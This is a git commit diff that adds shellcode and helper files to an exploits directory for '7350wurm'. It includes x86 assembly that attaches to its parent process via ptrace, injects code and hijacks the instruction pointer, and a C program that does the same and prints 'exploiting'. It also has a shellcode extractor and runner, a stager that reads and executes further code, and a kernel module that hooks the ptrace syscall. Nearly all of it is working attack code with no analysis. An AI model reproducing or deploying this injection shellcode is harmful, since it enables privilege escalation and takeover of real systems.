initial

13 files changed, 621 insertions, 0 deletions

diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s
new file mode 100644
index 0000000..5719ed7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
+
+        .globl  cbegin
+        .globl  cend
+
+
+cbegin:
+/* getppid */
+        pushl   $64
+        popl    %eax
+        int     $0x80
+/*      movl    %eax, %ecx      */
+        pushl   %eax
+        xchgl   %ebp, %eax
+        
+/* z_fork */
+        pushl   $2
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      fchild
+
+        /* waitpid (pid, NULL, 0) */
+        pushl   $7
+        popl    %esi
+        xchgl   %esi, %eax      /* eax = 7, esi = ppid */
+        xorl    %ecx, %ecx
+        xorl    %edx, %edx
+        int     $0x80
+
+        xorl    %eax, %eax
+        movb    $162, %al
+        pushl   $10
+        pushl   $10
+        movl    %esp, %ebx
+        movl    %esp, %ecx
+        int     $0x80
+ui:
+jmp ui
+        /* exit */
+fexit:  
+        
+        pushl   $1
+        popl    %eax
+        xorl    %ebx, %ebx
+        int     $0x80
+
+/*** CHILD ***/
+fchild: pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+
+        or      %eax, %eax
+        jne     fexit
+
+        popl    %ecx            /* parent process pid */
+/* ptrace attach */
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $16
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+        
+/* ptrace peekdata */
+        movl    $0x08048210, %edx
+/*      movl    $0xbf7ff010, %edx */
+        movl    $0xbffff010, %esi       
+        pushl   $127
+        popl    %edi
+loopa:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $2
+        popl    %ebx
+        pushl   %edi
+        int     $0x80
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopa
+
+/* ptrace getregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $12
+        popl    %ebx
+        pusha
+        movl    %esp, %esi
+        int     $0x80
+
+/* ptrace setregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    48(%esi), %edi
+        pushl   %edi
+        movl    $0x08048210, 48(%esi)
+/*      movl    $0xbf7ff010, 48(%esi)*/
+        int     $0x80
+
+        jmp     pointX
+pointY:
+
+        popl    %esi
+        movl    $0x08048210, %edx
+        pushl   $20
+        popl    %edi
+loopc:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopc
+
+
+/* ptrace pokedata */
+/*      movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        movl    $0xccccfeeb, %esi*/
+/*      movl    $0xbf7ff010, %edx*/
+        movl    $0x08048210, %edx
+/*      int     $0x80*/
+
+/*ptrace cont */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $7
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+
+/* wait 4 */
+/* 0 on return */
+        cdq
+        movl    %eax, %ebx
+        decl    %ebx
+        movl    %eax, %ecx
+        movb    $114, %al
+        int     $0x80   
+
+/* ptrace pokedata */   
+        movl    $0x08048210, %edx
+        movl    $0xbffff010, %esi
+/*      movl    $0xbf7ff010, %edx*/
+        pushl   $127
+        popl    %edi
+loopb:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopb
+
+/* ptrace setregs */
+        popl    %edi
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    %edi, 48(%esi)
+        int     $0x80
+
+
+/* ptrace detach */
+        movl    %ebp, %ecx
+        pushl   $17
+        popl    %ebx
+        pushl   $26
+        popl    %eax
+        cdq
+        movl    %edx, %esi
+        int     $0x80
+/* exit */      
+        xorl    %ecx, %ecx
+        incl    %esi
+        xchgl   %esi, %eax
+        int     $0x80
+pointX:
+        call    pointY
+
+        pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      pointA
+        int     $0x3
+pointA: 
+        jmp     pointA
+        
+        
+                
+
+        
+cend:
+
+
diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump
new file mode 100644
index 0000000..d442fa7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump
diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+
+#ifdef IRIX
+#include <sys/cachectl.h>
+#endif
+
+#ifdef HPUX
+extern char *   cbegin;
+extern char *   cend;
+#else
+extern void     cbegin ();
+extern void     cend ();
+#endif
+
+typedef void (* fptr)(void);
+
+int
+bad (unsigned char u);
+
+
+int
+main (int argc, char *argv[])
+{
+        int             i,
+                        bbytes = 0;
+        unsigned char * buf = (unsigned char *) cbegin;
+
+        unsigned char   ebuf[1024];
+        fptr            ebuf_p = (fptr) &ebuf[0];
+
+
+        fprintf (stderr, "/* %lu byte shellcode */\n",
+                (unsigned long int) cend - (unsigned long int) cbegin);
+
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                if (i % 12 == 0 && buf > (unsigned char *) cbegin)
+                        printf ("\n");
+                if (i % 12 == 0)
+                        printf ("\"");
+
+                if (bad (*buf & 0xff)) {
+                        printf ("_\\x%02x_", *buf & 0xff);
+                        bbytes += 1;
+                } else {
+                        printf ("\\x%02x", *buf & 0xff);
+                }
+
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"");
+                }
+        }
+        if (i % 12 == 0)
+                printf (";\n");
+        else
+                printf ("\";\n");
+
+        printf("\n");
+
+        fprintf (stderr, "bad bytes = %d\n", bbytes);
+
+        if (argc > 1) {
+                memcpy (ebuf, cbegin, (unsigned long int) cend -
+                        (unsigned long int) cbegin);
+#ifdef IRIX
+                memcpy (ebuf + ((unsigned long int) cend -
+                        (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
+                cacheflush (ebuf, sizeof (ebuf), BCACHE);
+#endif
+                ebuf_p ();
+        }
+
+        exit (EXIT_SUCCESS);
+}
+
+
+int
+bad (unsigned char u)
+{
+        if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+                return (1);
+
+        return (0);
+}
+
+
diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile
new file mode 100644
index 0000000..e5e1fd5
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/Makefile
@@ -0,0 +1,8 @@
+
+all:    rptrace.c
+        rm -f rptrace.o
+        gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o
+
+clean:
+        rm -f rptrace.o
+
diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README
new file mode 100644
index 0000000..0139382
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/README
@@ -0,0 +1,6 @@
+This is a *simple* HACK to get around the ptrace/exec security problem
+in linux <2.2.19. It simply disables ptrace for everyone except root.
+Just make, and insmod the .o .. and your uptime will be preserved! :P
+
+-MadCamel (madcamel@energymech.net)
+
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c
new file mode 100644
index 0000000..f7de48b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.c
@@ -0,0 +1,42 @@
+#define MODULE
+#define __KERNEL__
+#include <linux/module.h> 
+#include <linux/kernel.h>
+#include <sys/syscall.h>
+#include <linux/smp_lock.h>
+#include <linux/capability.h>  
+
+struct task_struct *init_hook = NULL;
+extern void *sys_call_table[];
+
+int (*o_ptrace)(int, int, int, int);
+
+int n_ptrace(int req, int pid, int addr, int data)
+{
+        int r;
+        
+        r = o_ptrace(req, pid, addr, data);
+        printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r);
+        return (r);
+}
+
+#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\
+                        sys_call_table[__NR_##x] = n_##x
+int init_module(void)
+{
+        lock_kernel();
+        EXPORT_NO_SYMBOLS;
+        REPLACE(ptrace);
+        unlock_kernel();
+        return(0);
+}
+
+#define RESTORE(x) sys_call_table[__NR_##x] = o_##x
+int cleanup_module(void)
+{
+        lock_kernel();
+        RESTORE(ptrace);
+        unlock_kernel();
+        return(0);
+}
+
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o
new file mode 100644
index 0000000..dd3bc56
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.o
diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz
new file mode 100644
index 0000000..06ba614
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/x.tar.gz
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
new file mode 100644
index 0000000..e3e02c1
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
new file mode 100644
index 0000000..870da8a
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
+/* -scutstyle */
+
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+
+pid_t z_fork (void);
+void hexdump (unsigned char *data, unsigned int amount);
+
+unsigned char   shellcode[] = "\x90\x90\xcc\x73";
+
+int
+main (int argc, char *argv[])
+{
+        pid_t                   cpid;
+        struct user             regs;
+        unsigned long int       safed_eip;
+        unsigned long int       addr,
+                                addr_walker;
+        unsigned char           data_saved[256];
+
+
+#if 0
+        if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) {
+                printf ("usage: %s <pid>\n", argv[0]);
+                exit (EXIT_FAILURE);
+        }
+#endif
+        cpid = getppid();
+        if (z_fork () != 0) {
+                printf ("parent. exiting.\n");
+                exit (EXIT_FAILURE);
+        }
+
+        printf ("pid = %d\n", cpid);
+
+        printf ("exploiting\n\n");
+
+        if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace");
+                exit (EXIT_FAILURE);
+        }
+
+        /* save data */
+        addr = 0xbffff010;
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
+                        addr + addr_walker, NULL);
+        }
+        hexdump (data_saved, sizeof (data_saved));
+
+        /* write */
+        for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
+                ++addr_walker)
+        {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        shellcode[addr_walker] & 0xff);
+        }
+
+        /* redirect eip */
+        memset (&regs, 0, sizeof (regs));
+        if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        // write eip */
+        safed_eip = regs.regs.eip;
+        regs.regs.eip = 0xbffff010;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+
+        if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_CONT");
+                exit (EXIT_FAILURE);
+        }
+
+        wait (NULL);
+        printf ("detrap\n");
+
+        /* restore */
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        data_saved[addr_walker] & 0xff);
+        }
+
+        /* restore regs */
+        regs.regs.eip = safed_eip;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+
+        if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+
+        exit (EXIT_SUCCESS);
+}
+
+
+
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+
+        return;
+}
+
+
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+
+                return (0);
+        }
+
+        waitpid (pid, NULL, 0);
+
+        return (pid);
+}
diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t
new file mode 100644
index 0000000..eb3478b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t
diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c
new file mode 100644
index 0000000..7c1aa4f
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t.c
@@ -0,0 +1,12 @@
+
+#include <stdio.h>
+
+int
+main (int argc, char *argv[])
+{
+        char *  foo[4] = { "./codedump", "a", "b", NULL };
+
+        execve (foo[0], foo, NULL);
+}
+
+
diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+        .globl  cbegin
+        .globl  cend
+
+cbegin:
+
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos: xorl    %ebx, %ebx
+        incl    %ebx            /* ebx = 1 */
+
+        movl    $0x0b51740b, %eax
+        subl    $0x01010101, %eax
+        push    %eax
+        movl    %esp, %ecx      /* ecx = "AAA\n" */
+
+        push    $0x04
+        pop     %eax            /* eax = 4 */
+        movl    %eax, %edx
+
+        int     $0x80           /* write (1, "AAA\n", 4) */
+
+        jmp     ctramp
+rd_cde: xorl    %ebx, %ebx
+        mull    %ebx            /* ebx = eax = edx = 0 */
+
+        decb    %dl             /* edx = 0xff */
+        popl    %ecx            /* ecx = ncode */
+
+        push    $0x3
+        pop     %eax
+
+        int     $0x80           /* read (0, ncode, 0xff) */
+        jmp     ncode
+
+ctramp: call    rd_cde
+ncode:
+
+cend:
+